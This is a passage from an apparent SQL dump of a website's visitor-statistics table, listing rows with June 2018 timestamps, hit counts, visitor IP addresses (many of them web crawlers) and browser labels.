1528719847,1,1,0,0,'46.200.249.17','chrome'),(258442,1528719925,2,2,0,0,'91.196.178.70','chrome'),(258443,1528720146,1,1,0,0,'54.36.148.78','other'),(258444,1528720429,4,4,0,0,'195.10.210.70','chrome'),(258445,1528720460,1,1,0,0,'54.36.148.51','other'),(258446,1528720590,2,0,2,0,'66.249.66.155',''),(258447,1528720683,1,1,0,0,'87.250.224.46','other'),(258448,1528720771,2,2,0,0,'195.10.210.70','firefox'),(258449,1528720948,2,2,0,0,'91.196.178.70','chrome'),(258450,1528721133,1,1,0,0,'54.36.148.222','other'),(258451,1528721140,1,1,0,0,'54.36.148.110','other'),(258452,1528721191,1,1,0,0,'54.36.149.14','other'),(258453,1528721244,1,1,0,0,'54.36.148.211','other'),(258454,1528721256,1,1,0,0,'141.8.142.74','other'),(258455,1528721265,1,1,0,0,'54.36.148.55','other'),(258456,1528721285,1,1,0,0,'54.36.148.131','other'),(258457,1528721752,1,1,0,0,'54.36.148.44','other'),(258458,1528721870,1,0,1,0,'66.249.66.156',''),(258459,1528721923,1,1,0,0,'54.36.148.107','other'),(258460,1528722171,1,1,0,0,'54.36.149.56','other'),(258461,1528722462,1,1,0,0,'54.36.149.60','other'),(258462,1528722463,1,1,0,0,'37.9.113.182','other'),(258463,1528722562,2,2,0,0,'91.196.178.70','chrome'),(258464,1528722759,1,1,0,0,'54.36.148.55','other'),(258465,1528722824,1,1,0,0,'95.163.255.106','other'),(258466,1528722871,1,1,0,0,'95.163.255.103','other'),(258467,1528722945,1,1,0,0,'54.36.148.127','other'),(258468,1528723057,1,1,0,0,'54.36.148.136','other'),(258469,1528723071,1,1,0,0,'54.36.149.28','other'),(258470,1528723239,1,1,0,0,'93.183.226.149','chrome'),(258471,1528723541,1,1,0,0,'66.249.66.75','chrome'),(258472,1528723803,2,0,2,0,'66.249.66.157',''),(258473,1528724039,1,1,0,0,'54.36.148.113','other'),(258474,1528724098,1,1,0,0,'95.133.61.203','chrome'),(258475,1528724145,1,1,0,0,'54.165.59.7','other'),(258476,1528724148,1,1,0,0,'37.55.77.44','chrome'),(258477,1528724683,1,1,0,0,'91.196.178.75','firefox'),(258478,1528724884,1,1,0,0,'8.29.198.25','other'),(258479,1528724917,1,1,0,0,'54.36.148.47','other'),(258480,1528725559,1,1,0,0,'54.36.148.233','other'),(258481,1528725809,2,2,0,0,'91.196.178.66','chrome'),(258482,1528725955,1,1,0,0,'91.196.178.181','chrome'),(258483,1528725972,1,0,1,0,'66.249.66.156',''),(258484,1528726002,1,1,0,0,'82.193.109.241','firefox'),(258485,1528726070,1,1,0,0,'54.36.149.46','other'),(258486,1528726073,1,1,0,0,'141.8.142.74','other'),(258487,1528726249,1,1,0,0,'54.36.148.91','other'),(258488,1528726424,1,1,0,0,'54.36.149.48','other'),(258489,1528726720,1,1,0,0,'134.249.147.14','chrome'),(258490,1528726752,1,1,0,0,'54.36.148.181','other'),(258491,1528727000,1,1,0,0,'54.36.148.65','other'),(258492,1528727006,1,1,0,0,'54.36.148.144','other'),(258493,1528727667,1,1,0,0,'54.36.148.247','other'),(258494,1528727676,1,0,1,0,'66.249.66.156',''),(258495,1528727968,2,2,0,0,'91.196.178.78','chrome'),(258496,1528728008,1,1,0,0,'54.36.148.149','other'),(258497,1528728057,1,1,0,0,'54.36.149.103','other'),(258498,1528728116,1,1,0,0,'54.36.148.56','other'),(258499,1528728289,1,1,0,0,'54.36.149.37','other'),(258500,1528728554,1,1,0,0,'54.36.149.99','other'),(258501,1528728614,1,1,0,0,'54.36.148.51','other'),(258502,1528728751,2,2,0,0,'54.36.148.42','other'),(258503,1528728936,1,1,0,0,'157.55.39.231','other'),(258504,1528728938,1,1,0,0,'54.36.148.23','other'),(258505,1528729036,2,2,0,0,'54.36.148.79','other'),(258506,1528729136,1,1,0,0,'54.36.148.204','other'),(258507,1528729215,2,2,0,0,'216.244.66.241','other'),(258508,1528729233,1,1,0,0,'54.36.148.12','other'),(258509,1528729236,1,1,0,0,'54.36.148.141','other'),(258510,1528729282,1,1,0,0,'54.36.148.60','other'),(258511,1528729351,1,0,1,0,'66.249.66.155',''),(258512,1528729524,1,1,0,0,'54.36.149.93','other'),(258513,1528729619,1,1,0,0,'54.36.148.233','other'),(258514,1528729724,1,1,0,0,'54.36.148.179','other'),(258515,1528729881,1,1,0,0,'54.36.149.37','other'),(258516,1528729886,1,1,0,0,'54.36.148.15','other'),(258517,1528729904,1,1,0,0,'54.36.148.215','other'),(258518,1528730052,1,1,0,0,'54.36.148.133','other'),(258519,1528730188,1,1,0,0,'8.29.198.26','other'),(258520,1528730902,1,1,0,0,'54.36.148.93','other'),(258521,1528731065,1,1,0,0,'46.105.124.55','firefox'),(258522,1528731074,1,1,0,0,'54.36.149.38','other'),(258523,1528731263,1,1,0,0,'178.154.171.88','other'),(258524,1528731314,1,1,0,0,'54.36.149.71','other'),(258525,1528731365,1,1,0,0,'54.36.148.243','other'),(258526,1528731557,1,1,0,0,'93.209.12.112','other'),(258527,1528731565,1,1,0,0,'54.36.148.208','other'),(258528,1528731696,1,1,0,0,'180.76.15.24','other'),(258529,1528731741,1,1,0,0,'54.36.148.46','other'),(258530,1528731935,1,1,0,0,'54.36.148.111','other'),(258531,1528732032,1,1,0,0,'54.36.149.87','other'),(258532,1528732243,1,1,0,0,'54.36.148.162','other'),(258533,1528732316,1,0,1,0,'66.249.66.155',''),(258534,1528732776,1,1,0,0,'212.3.111.198','chrome'),(258535,1528733007,30,30,0,0,'217.182.252.214','other'),(258536,1528733494,1,1,0,0,'54.36.149.80','other'),(258537,1528733660,1,0,1,0,'66.249.66.157',''),(258538,1528733733,1,1,0,0,'141.8.142.74','other'),(258539,1528733773,1,1,0,0,'54.36.148.190','other'),(258540,1528733854,1,1,0,0,'54.36.148.96','other'),(258541,1528733879,1,1,0,0,'54.36.148.119','other'),(258542,1528733914,1,1,0,0,'54.36.148.89','other'),(258543,1528734021,1,1,0,0,'91.196.178.75','firefox'),(258544,1528734071,1,1,0,0,'54.36.148.28','other'),(258545,1528734348,1,1,0,0,'54.36.148.133','other'),(258546,1528734379,1,1,0,0,'54.36.148.10','other'),(258547,1528734823,1,1,0,0,'54.36.148.76','other'),(258548,1528734875,1,1,0,0,'54.36.148.11','other'),(258549,1528734894,1,1,0,0,'54.36.149.21','other'),(258550,1528735492,1,1,0,0,'54.36.149.17','other'),(258551,1528735616,1,1,0,0,'54.36.149.49','other'),(258552,1528735679,1,1,0,0,'54.36.148.38','other'),(258553,1528735714,2,2,0,0,'91.196.178.164','chrome'),(258554,1528735745,1,1,0,0,'8.29.198.25','other'),(258555,1528736029,1,1,0,0,'37.147.247.116','msie'),(258556,1528736031,1,1,0,0,'128.72.37.124','msie'),(258557,1528736328,1,1,0,0,'141.8.142.74','other'),(258558,1528736487,1,0,1,0,'66.249.66.156',''),(258559,1528736513,1,1,0,0,'54.36.148.81','other'),(258560,1528736540,1,1,0,0,'54.36.148.163','other'),(258561,1528736636,1,1,0,0,'54.36.148.115','other'),(258562,1528736703,1,1,0,0,'54.36.148.175','other'),(258563,1528736798,1,1,0,0,'54.36.149.42','other'),(258564,1528736832,1,1,0,0,'54.36.148.144','other'),(258565,1528736864,1,1,0,0,'54.36.148.114','other'),(258566,1528736892,1,1,0,0,'54.36.148.71','other'),(258567,1528736968,1,1,0,0,'54.36.148.128','other'),(258568,1528737079,1,1,0,0,'54.165.59.7','other'),(258569,1528737109,1,1,0,0,'54.36.148.20','other'),(258570,1528737192,1,1,0,0,'54.36.148.75','other'),(258571,1528737196,1,1,0,0,'54.36.148.108','other'),(258572,1528737287,1,1,0,0,'54.36.148.33','other'),(258573,1528737573,1,1,0,0,'31.162.177.206','chrome'),(258574,1528737671,1,1,0,0,'54.36.148.94','other'),(258575,1528737683,1,1,0,0,'54.36.149.69','other'),(258576,1528737689,1,1,0,0,'54.36.149.31','other'),(258577,1528737865,1,1,0,0,'54.36.148.214','other'),(258578,1528738225,1,1,0,0,'178.154.171.88','other'),(258579,1528738229,1,1,0,0,'54.36.148.126','other'),(258580,1528738523,2,2,0,0,'54.36.148.82','other'),(258581,1528738750,1,1,0,0,'54.36.149.40','other'),(258582,1528738833,1,1,0,0,'54.36.149.15','other'),(258583,1528739209,1,1,0,0,'54.36.148.42','other'),(258584,1528739282,1,1,0,0,'54.36.149.97','other'),(258585,1528739468,1,1,0,0,'54.36.148.233','other'),(258586,1528739662,1,1,0,0,'54.36.148.142','other'),(258587,1528739719,1,1,0,0,'54.36.149.54','other'),(258588,1528739782,1,1,0,0,'216.244.66.241','other'),(258589,1528739981,1,1,0,0,'54.36.149.87','other'),(258590,1528740023,1,1,0,0,'54.36.148.86','other'),(258591,1528740036,1,1,0,0,'54.36.149.53','other'),(258592,1528740134,1,1,0,0,'54.36.149.34','other'),(258593,1528740166,1,1,0,0,'54.36.148.43','other'),(258594,1528740202,1,1,0,0,'178.154.171.88','other'),(258595,1528740217,1,1,0,0,'54.36.148.61','other'),(258596,1528740228,1,1,0,0,'54.36.148.163','other'),(258597,1528740385,1,1,0,0,'54.36.148.92','other'),(258598,1528740503,1,1,0,0,'54.36.148.218','other'),(258599,1528740786,1,1,0,0,'87.250.224.46','other'),(258600,1528741023,1,1,0,0,'8.29.198.27','other'),(258601,1528741091,1,1,0,0,'54.36.148.229','other'),(258602,1528741223,1,0,1,0,'66.249.66.155',''),(258603,1528741347,1,1,0,0,'40.77.167.18','other'),(258604,1528741392,1,1,0,0,'54.36.148.145','other'),(258605,1528741411,1,1,0,0,'54.36.148.232','other'),(258606,1528741427,1,1,0,0,'54.36.148.134','other'),(258607,1528741475,3,3,0,0,'141.8.142.74','other'),(258608,1528741619,1,1,0,0,'54.165.59.7','other'),(258609,1528741622,1,1,0,0,'66.249.66.157','chrome'),(258610,1528741862,1,1,0,0,'54.36.148.113','other'),(258611,1528742018,1,1,0,0,'54.36.148.243','other'),(258612,1528742238,1,1,0,0,'54.36.149.54','other'),(258613,1528742422,1,1,0,0,'54.36.148.180','other'),(258614,1528742480,2,2,0,0,'216.244.66.241','other'),(258615,1528742496,1,1,0,0,'207.46.13.0','other'),(258616,1528742679,1,1,0,0,'54.36.148.76','other'),(258617,1528742772,1,1,0,0,'54.36.148.101','other'),(258618,1528742846,1,1,0,0,'54.36.148.100','other'),(258619,1528743068,1,1,0,0,'87.250.224.46','other'),(258620,1528743079,1,1,0,0,'54.36.148.88','other'),(258621,1528743284,1,1,0,0,'35.198.143.220','firefox'),(258622,1528743452,1,1,0,0,'54.36.148.230','other'),(258623,1528743758,1,1,0,0,'54.36.148.218','other'),(258624,1528744494,1,1,0,0,'54.36.148.188','other'),(258625,1528744543,1,1,0,0,'54.36.148.210','other'),(258626,1528744658,1,1,0,0,'54.36.149.32','other'),(258627,1528744940,1,1,0,0,'54.36.148.236','other'),(258628,1528745041,1,1,0,0,'54.36.148.137','other'),(258629,1528745217,1,1,0,0,'54.36.148.208','other'),(258630,1528746492,1,1,0,0,'178.92.137.167','chrome'),(258631,1528746578,1,1,0,0,'8.29.198.26','other'),(258632,1528748012,1,1,0,0,'91.209.11.236','other'),(258633,1528748109,1,1,0,0,'46.161.9.39','other'),(258634,1528748466,1,1,0,0,'66.249.66.75','chrome'),(258635,1528749243,1,1,0,0,'178.154.171.88','other'),(258636,1528749713,1,1,0,0,'54.165.59.7','other'),(258637,1528749888,1,1,0,0,'95.163.255.19','other'),(258638,1528751313,1,1,0,0,'213.202.254.136','opera'),(258639,1528751853,1,1,0,0,'8.29.198.27','other'),(258640,1528752884,1,1,0,0,'95.163.255.97','other'),(258641,1528753454,1,1,0,0,'141.8.142.74','other'),(258642,1528754291,1,1,0,0,'216.244.66.241','other'),(258643,1528754649,1,1,0,0,'91.209.11.236','other'),(258644,1528754792,1,0,1,0,'66.249.66.156',''),(258645,1528756903,1,1,0,0,'216.244.66.241','other'),(258646,1528757409,1,1,0,0,'8.29.198.27','other'),(258647,1528757637,1,1,0,0,'40.77.167.18','other'),(258648,1528757713,1,1,0,0,'176.193.110.109','msie'),(258649,1528757718,1,1,0,0,'95.24.232.98','msie'),(258650,1528758222,1,1,0,0,'95.163.255.95','other'),(258651,1528759086,1,1,0,0,'52.91.148.172','other'),(258652,1528759665,1,1,0,0,'178.154.200.41','other'),(258653,1528759669,1,1,0,0,'213.180.203.8','other'),(258654,1528762069,1,1,0,0,'157.55.39.115','other'),(258655,1528762150,1,0,1,0,'66.249.66.155',''),(258656,1528762586,1,1,0,0,'141.8.142.74','other'),(258657,1528762599,1,1,0,0,'95.163.255.96','other'),(258658,1528762687,1,1,0,0,'8.29.198.25','other'),(258659,1528763043,1,1,0,0,'52.86.72.6','other'),(258660,1528763554,1,1,0,0,'216.244.66.241','other'),(258661,1528763706,1,0,1,0,'66.249.66.156',''),(258662,1528764593,2,2,0,0,'216.244.66.241','other'),(258663,1528767091,1,1,0,0,'95.220.196.233','firefox'),(258664,1528768244,1,1,0,0,'8.29.198.25','other'),(258665,1528769002,1,1,0,0,'80.93.187.57','firefox'),(258666,1528770916,1,1,0,0,'207.46.13.0','other'),(258667,1528771455,2,2,0,0,'95.213.141.126','opera'),(258668,1528771876,59,59,0,0,'79.137.34.230','other'),(258669,1528772603,1,1,0,0,'157.55.39.115','other'),(258670,1528773524,1,1,0,0,'8.29.198.25','other'),(258671,1528773969,1,1,0,0,'216.244.66.241','other'),(258672,1528774872,1,1,0,0,'40.77.167.18','other'),(258673,1528775113,1,0,1,0,'66.249.66.156',''),(258674,1528776485,1,0,1,0,'66.249.66.74',''),(258675,1528776643,1,0,1,0,'66.249.66.76',''),(258676,1528778513,3,0,3,0,'66.249.66.155',''),(258677,1528779095,1,1,0,0,'8.29.198.27','other'),(258678,1528779816,1,1,0,0,'188.230.43.254','other'),(258679,1528780374,5,5,0,0,'173.208.206.50','other'),(258680,1528781422,1,1,0,0,'134.249.147.14','chrome'),(258681,1528781744,1,1,0,0,'157.55.39.115','other'),(258682,1528781894,1,1,0,0,'91.196.178.181','chrome'),(258683,1528781915,2,0,2,0,'66.249.66.156',''),(258684,1528782215,1,1,0,0,'188.230.43.254','other'),(258685,1528782271,1,1,0,0,'40.77.167.18','other'),(258686,1528782621,1,1,0,0,'37.55.77.44','chrome'),(258687,1528783020,3,3,0,0,'91.196.177.46','chrome'),(258688,1528783522,1,1,0,0,'87.250.224.46','other'),(258689,1528783823,1,0,1,0,'66.249.66.156',''),(258690,1528784170,1,1,0,0,'188.230.43.254','other'),(258691,1528784205,1,1,0,0,'95.133.45.116','chrome'),(258692,1528784304,1,1,0,0,'91.196.178.181','chrome'),(258693,1528784360,1,1,0,0,'8.29.198.25','other'),(258694,1528784470,1,1,0,0,'157.55.39.115','other'),(258695,1528784571,1,1,0,0,'216.244.66.241','other'),(258696,1528784785,2,2,0,0,'91.196.178.87','chrome'),(258697,1528785063,1,1,0,0,'180.76.15.151','other'),(258698,1528785094,1,1,0,0,'95.163.255.19','other'),(258699,1528785290,1,1,0,0,'178.154.171.88','other'),(258700,1528785331,1,0,1,0,'66.249.66.76',''),(258701,1528785619,1,1,0,0,'91.196.178.181','chrome'),(258702,1528785817,1,1,0,0,'91.196.177.46','chrome'),(258703,1528785912,1,1,0,0,'216.244.66.241','other'),(258704,1528786107,1,1,0,0,'91.196.178.103','chrome'),(258705,1528786542,3,3,0,0,'69.58.178.59','other'),(258706,1528786575,1,1,0,0,'91.196.179.138','chrome'),(258707,1528787247,2,2,0,0,'91.196.178.182','chrome'),(258708,1528787973,1,1,0,0,'146.120.97.10','chrome'),(258709,1528788091,1,1,0,0,'188.230.43.254','msie'),(258710,1528788202,1,1,0,0,'157.55.39.115','other'),(258711,1528788481,1,0,1,0,'66.249.66.157',''),(258712,1528788907,1,1,0,0,'208.110.93.78','other'),(258713,1528789247,1,1,0,0,'37.9.113.182','other'),(258714,1528789332,1,1,0,0,'141.8.142.74','other'),(258715,1528789925,1,1,0,0,'8.29.198.27','other'),(258716,1528790027,1,0,1,0,'66.249.66.76',''),(258717,1528790424,1,1,0,0,'157.55.39.231','other'),(258718,1528790446,1,1,0,0,'91.196.178.87','chrome'),(258719,1528790604,1,1,0,0,'193.34.93.8','chrome'),(258720,1528791022,2,2,0,0,'78.111.185.103','chrome'),(258721,1528791537,1,1,0,0,'162.210.196.98','other'),(258722,1528791592,1,1,0,0,'91.196.177.15','chrome'),(258723,1528791600,1,1,0,0,'178.94.251.254','chrome'),(258724,1528791670,1,1,0,0,'46.200.163.136','chrome'),(258725,1528791693,1,1,0,0,'78.111.187.225','chrome'),(258726,1528792289,1,1,0,0,'91.196.178.129','firefox'),(258727,1528792501,1,1,0,0,'91.196.177.15','chrome'),(258728,1528792519,1,1,0,0,'91.196.178.129','chrome'),(258729,1528792691,1,1,0,0,'157.55.39.231','other'),(258730,1528792748,2,2,0,0,'91.196.178.186','chrome'),(258731,1528793319,2,2,0,0,'37.53.212.34','chrome'),(258732,1528793742,1,1,0,0,'77.111.244.7','chrome'),(258733,1528793834,2,2,0,0,'46.174.163.134','chrome'),(258734,1528793942,1,1,0,0,'178.154.171.88','other'),(258735,1528793946,1,1,0,0,'141.8.142.74','other'),(258736,1528795195,1,1,0,0,'8.29.198.25','other'),(258737,1528795220,1,1,0,0,'216.244.66.241','other'),(258738,1528795963,2,2,0,0,'91.196.178.186','chrome'),(258739,1528796135,1,1,0,0,'216.244.66.241','other'),(258740,1528796514,1,1,0,0,'40.77.167.174','other'),(258741,1528796860,1,1,0,0,'95.163.255.99','other'),(258742,1528797805,1,0,1,0,'66.249.66.155',''),(258743,1528798441,1,1,0,0,'77.111.244.35','chrome'),(258744,1528798989,2,2,0,0,'91.196.178.74','chrome'),(258745,1528799012,1,1,0,0,'216.244.66.241','other'),(258746,1528800215,4,4,0,0,'216.244.66.241','other'),(258747,1528800447,1,1,0,0,'92.113.156.120','chrome'),(258748,1528800504,1,1,0,0,'141.8.142.74','other'),(258749,1528800515,1,1,0,0,'134.249.147.14','chrome'),(258750,1528800766,1,1,0,0,'8.29.198.25','other'),(258751,1528801213,3,3,0,0,'216.244.66.241','other'),(258752,1528801475,2,0,2,0,'66.249.66.155',''),(258753,1528802084,1,1,0,0,'37.52.139.230','chrome'),(258754,1528802510,2,2,0,0,'141.8.142.74','other'),(258755,1528802598,2,2,0,0,'216.244.66.241','other'),(258756,1528802907,1,1,0,0,'178.154.171.88','other'),(258757,1528802990,1,1,0,0,'77.111.247.51','chrome'),(258758,1528803039,1,0,1,0,'66.249.66.75',''),(258759,1528803110,1,1,0,0,'91.196.178.73','firefox'),(258760,1528804242,1,1,0,0,'216.244.66.241','other'),(258761,1528804403,1,1,0,0,'141.8.142.74','other'),(258762,1528805104,1,1,0,0,'66.249.66.157','chrome'),(258763,1528805598,1,1,0,0,'91.196.178.73','firefox'),(258764,1528805743,1,1,0,0,'178.154.171.88','other'),(258765,1528805880,1,1,0,0,'176.113.209.223','chrome'),(258766,1528805942,2,2,0,0,'91.196.178.70','chrome'),(258767,1528806030,1,1,0,0,'8.29.198.25','other'),(258768,1528806232,2,2,0,0,'216.244.66.241','other'),(258769,1528806378,1,1,0,0,'37.54.170.139','chrome'),(258770,1528806683,1,1,0,0,'141.8.142.74','other'),(258771,1528807764,1,1,0,0,'148.251.120.201','other'),(258772,1528807888,2,2,0,0,'62.210.252.126','chrome'),(258773,1528808021,1,1,0,0,'216.244.66.241','other'),(258774,1528808754,1,1,0,0,'178.154.171.88','other'),(258775,1528809043,1,1,0,0,'141.8.142.74','other'),(258776,1528809101,2,2,0,0,'91.196.178.70','chrome'),(258777,1528809180,1,1,0,0,'216.244.66.241','other'),(258778,1528809565,1,1,0,0,'66.249.66.74','chrome'),(258779,1528809901,1,1,0,0,'188.230.43.254','other'),(258780,1528810489,1,1,0,0,'216.244.66.241','other'),(258781,1528810736,1,1,0,0,'91.196.178.52','chrome'),(258782,1528811208,1,1,0,0,'82.207.47.76','chrome'),(258783,1528811497,1,1,0,0,'91.196.177.46','chrome'),(258784,1528811599,1,1,0,0,'8.29.198.25','other'),(258785,1528811681,2,2,0,0,'91.196.177.15','chrome'),(258786,1528811932,1,1,0,0,'207.46.13.165','other'),(258787,1528812063,1,1,0,0,'37.9.113.182','other'),(258788,1528812183,1,1,0,0,'188.230.43.254','other'),(258789,1528812292,2,2,0,0,'91.196.178.70','chrome'),(258790,1528812994,1,1,0,0,'89.28.203.14','chrome'),(258791,1528813304,1,1,0,0,'91.196.178.88','firefox'),(258792,1528813344,1,1,0,0,'141.8.142.74','other'),(258793,1528813585,1,1,0,0,'91.124.182.170','firefox'),(258794,1528814586,1,1,0,0,'188.230.43.254','other'),(258795,1528815447,2,2,0,0,'216.244.66.241','other'),(258796,1528816412,1,1,0,0,'141.8.142.74','other'),(258797,1528816857,1,1,0,0,'8.29.198.27','other'),(258798,1528817028,1,1,0,0,'188.230.43.254','other'),(258799,1528817578,1,1,0,0,'62.205.134.182','msie'),(258800,1528817638,1,1,0,0,'91.196.178.135','chrome'),(258801,1528818143,1,0,1,0,'66.249.66.155',''),(258802,1528818170,2,2,0,0,'216.244.66.241','other'),(258803,1528818542,2,0,2,0,'66.249.66.157',''),(258804,1528819989,1,1,0,0,'188.230.43.254','other'),(258805,1528820398,2,2,0,0,'91.196.178.180','chrome'),(258806,1528820819,1,0,1,0,'66.249.66.157',''),(258807,1528821000,2,2,0,0,'95.163.255.104','other'),(258808,1528821168,1,0,1,0,'66.249.66.156',''),(258809,1528822066,1,1,0,0,'91.196.178.88','firefox'),(258810,1528822386,1,1,0,0,'188.230.43.254','other'),(258811,1528822396,1,1,0,0,'95.163.255.13','other'),(258812,1528822446,1,1,0,0,'8.29.198.27','other'),(258813,1528823173,1,1,0,0,'87.250.224.46','other'),(258814,1528823223,1,1,0,0,'216.244.66.241','other'),(258815,1528824061,1,1,0,0,'141.8.142.74','other'),(258816,1528824533,1,1,0,0,'207.46.13.165','other'),(258817,1528824635,1,1,0,0,'216.244.66.241','other'),(258818,1528824838,1,1,0,0,'188.230.43.254','other'),(258819,1528826768,1,1,0,0,'141.8.142.74','other'),(258821,1528827246,1,1,0,0,'87.250.224.46','other'),(258822,1528827296,1,1,0,0,'207.46.13.164','other'),(258823,1528827621,2,2,0,0,'91.196.178.180','chrome'),(258824,1528827755,1,1,0,0,'8.29.198.27','other'),(258825,1528827861,2,2,0,0,'91.196.178.181','chrome'),(258826,1528828582,1,1,0,0,'216.244.66.241','other'),(258827,1528828925,1,1,0,0,'37.9.113.182','other'),(258828,1528828928,1,1,0,0,'141.8.142.167','other'),(258829,1528828931,1,1,0,0,'37.9.113.114','other'),(258830,1528830138,1,1,0,0,'157.55.39.31','other'),(258831,1528830901,1,1,0,0,'87.250.224.85','other'),(258832,1528830907,1,1,0,0,'37.9.113.186','other'),(258833,1528831033,1,1,0,0,'37.9.113.132','other'),(258834,1528831036,1,1,0,0,'141.8.142.29','other'),(258835,1528831156,1,1,0,0,'157.55.39.31','other'),(258836,1528831445,1,0,1,0,'66.249.66.155',''),(258837,1528832022,1,1,0,0,'5.45.207.82','other'),(258838,1528832667,1,1,0,0,'37.9.113.134','other'),(258839,1528832684,1,1,0,0,'178.154.200.45','other'),(258840,1528832745,1,1,0,0,'178.154.200.7','other'),(258841,1528832905,1,1,0,0,'216.244.66.241','other'),(258842,1528833261,1,1,0,0,'157.55.39.31','other'),(258843,1528833297,1,1,0,0,'8.29.198.26','other'),(258844,1528833677,1,1,0,0,'5.188.62.117','chrome'),(258845,1528834500,1,1,0,0,'207.46.13.165','other'),(258846,1528835192,1,1,0,0,'37.9.113.63','other'),(258847,1528835259,1,1,0,0,'141.8.142.50','other'),(258848,1528835608,1,0,1,0,'66.249.64.29',''),(258849,1528836124,1,1,0,0,'141.8.142.167','other'),(258850,1528836226,1,1,0,0,'178.154.200.41','other'),(258851,1528838268,1,1,0,0,'216.244.66.241','other'),(258852,1528838550,1,1,0,0,'18.204.7.14','other'),(258853,1528838607,1,1,0,0,'8.29.198.25','other'),(258854,1528838650,1,0,1,0,'66.249.70.29',''),(258855,1528838953,1,1,0,0,'207.46.13.164','other'),(258856,1528839728,1,1,0,0,'141.8.142.126','other'),(258857,1528840162,1,1,0,0,'144.76.7.79','other'),(258858,1528840195,1,1,0,0,'110.83.60.145','other'),(258859,1528841495,822,822,0,0,'185.6.8.7','other'),(258860,1528842397,18,18,0,0,'185.6.8.7','other'),(258861,1528844138,1,1,0,0,'8.29.198.27','other'),(258862,1528844244,1,1,0,0,'95.163.255.95','other'),(258863,1528845863,1,1,0,0,'18.206.232.234','other'),(258864,1528849441,1,1,0,0,'8.29.198.26','other'),(258865,1528851435,1,0,1,0,'66.249.64.30',''),(258866,1528851453,1,1,0,0,'216.244.66.241','other'),(258867,1528853963,1,1,0,0,'213.180.203.40','other'),(258868,1528854981,1,1,0,0,'8.29.198.26','other'),(258869,1528856720,31,31,0,0,'81.109.85.9','other'),(258870,1528856824,1,1,0,0,'141.8.142.74','other'),(258871,1528857913,1,1,0,0,'178.154.171.88','other'),(258872,1528858243,1,1,0,0,'13.57.220.0','chrome'),(258873,1528859709,2,2,0,0,'95.213.141.126','opera'),(258874,1528860293,1,1,0,0,'8.29.198.26','other'),(258875,1528860523,1,1,0,0,'46.246.45.63','other'),(258876,1528860831,1,0,1,0,'66.249.64.28',''),(258877,1528861111,1,1,0,0,'95.163.255.15','other'),(258878,1528862350,1,1,0,0,'91.196.177.118','chrome'),(258879,1528862520,1,1,0,0,'78.46.61.245','other'),(258880,1528862713,1,0,1,0,'66.249.64.28',''),(258881,1528863286,1,1,0,0,'141.8.142.74','other'),(258882,1528863527,1,1,0,0,'40.77.167.126','other'),(258883,1528863619,1,1,0,0,'91.196.177.118','chrome'),(258884,1528864058,1,0,1,0,'66.249.64.30',''),(258885,1528864529,1,1,0,0,'216.244.66.241','other'),(258886,1528864646,1,1,0,0,'91.196.178.133','firefox'),(258887,1528865377,2,2,0,0,'91.196.178.161','chrome'),(258888,1528865438,1,1,0,0,'178.154.171.88','other'),(258889,1528865535,1,1,0,0,'66.249.70.27','chrome'),(258890,1528865596,1,1,0,0,'40.77.167.126','other'),(258891,1528865751,1,1,0,0,'91.196.178.47','chrome'),(258892,1528865842,1,1,0,0,'8.29.198.26','other'),(258893,1528866925,1,1,0,0,'95.163.255.19','other'),(258894,1528867107,2,2,0,0,'91.196.178.87','chrome'),(258895,1528867237,1,1,0,0,'66.249.64.28','chrome'),(258896,1528867583,1,1,0,0,'91.196.178.66','chrome'),(258897,1528867674,1,1,0,0,'134.249.147.14','chrome'),(258898,1528867902,1,1,0,0,'91.196.178.68','firefox'),(258899,1528868162,32,32,0,0,'167.114.219.41','other'),(258900,1528868473,1,1,0,0,'178.154.171.88','other'),(258901,1528868897,1,1,0,0,'91.196.178.73','firefox'),(258902,1528869239,2,2,0,0,'91.196.178.182','chrome'),(258903,1528869263,1,1,0,0,'37.55.253.211','chrome'),(258904,1528869565,1,1,0,0,'178.154.171.88','other'),(258905,1528869611,1,1,0,0,'216.244.66.241','other'),(258906,1528869630,1,1,0,0,'46.200.31.204','chrome'),(258907,1528869768,1,1,0,0,'91.196.177.15','chrome'),(258908,1528869781,1,1,0,0,'95.132.35.223','firefox'),(258909,1528870470,1,1,0,0,'46.161.9.39','firefox'),(258910,1528870674,1,1,0,0,'66.249.64.30','chrome'),(258911,1528870964,2,2,0,0,'91.196.177.46','chrome'),(258912,1528871142,1,1,0,0,'8.29.198.26','other'),(258913,1528871544,2,2,0,0,'91.196.178.80','chrome'),(258914,1528871701,1,0,1,0,'66.249.64.28',''),(258915,1528872232,2,2,0,0,'216.244.66.241','other'),(258916,1528872233,1,1,0,0,'91.196.178.47','chrome'),(258917,1528872464,1,1,0,0,'95.132.35.223','firefox'),(258918,1528873377,2,2,0,0,'188.230.26.88','firefox'),(258919,1528873521,1,1,0,0,'91.196.177.46','chrome'),(258920,1528873779,1,1,0,0,'216.244.66.241','other'),(258921,1528873833,1,1,0,0,'66.249.64.30','chrome'),(258922,1528874238,1,1,0,0,'91.196.178.47','chrome'),(258923,1528874877,1,1,0,0,'91.196.178.66','firefox'),(258924,1528874924,2,2,0,0,'216.244.66.241','other'),(258925,1528875535,32,32,0,0,'167.114.219.41','other'),(258926,1528876467,1,1,0,0,'216.244.66.241','other'),(258927,1528876716,1,1,0,0,'8.29.198.25','other'),(258928,1528877940,1,1,0,0,'95.163.255.94','other'),(258929,1528878517,1,1,0,0,'91.196.178.70','chrome'),(258930,1528878587,1,1,0,0,'95.134.15.98','chrome'),(258931,1528878975,2,2,0,0,'216.244.66.241','other'),(258932,1528879308,4,4,0,0,'82.207.121.233','chrome'),(258933,1528879618,4,4,0,0,'91.196.178.70','chrome'),(258934,1528880131,1,1,0,0,'91.196.178.103','chrome'),(258935,1528880433,7,7,0,0,'158.69.23.126','other'),(258936,1528880649,1,1,0,0,'130.180.210.235','chrome'),(258937,1528880659,1,1,0,0,'141.8.142.74','other'),(258938,1528880727,2,2,0,0,'91.196.178.189','chrome'),(258939,1528881688,1,1,0,0,'216.244.66.241','other'),(258940,1528881965,4,4,0,0,'91.196.178.103','chrome'),(258941,1528882000,1,1,0,0,'8.29.198.27','other'),(258942,1528882513,1,1,0,0,'62.205.134.182','msie'),(258943,1528883016,2,2,0,0,'78.111.190.136','chrome'),(258944,1528883786,3,3,0,0,'216.244.66.241','other'),(258945,1528885079,1,1,0,0,'37.55.224.83','chrome'),(258946,1528885095,2,2,0,0,'216.244.66.241','other'),(258947,1528885882,1,1,0,0,'151.16.85.194','chrome'),(258948,1528887579,1,1,0,0,'8.29.198.27','other'),(258949,1528887683,1,1,0,0,'216.244.66.241','other'),(258950,1528887991,1,1,0,0,'91.196.178.182','chrome'),(258951,1528888116,1,1,0,0,'199.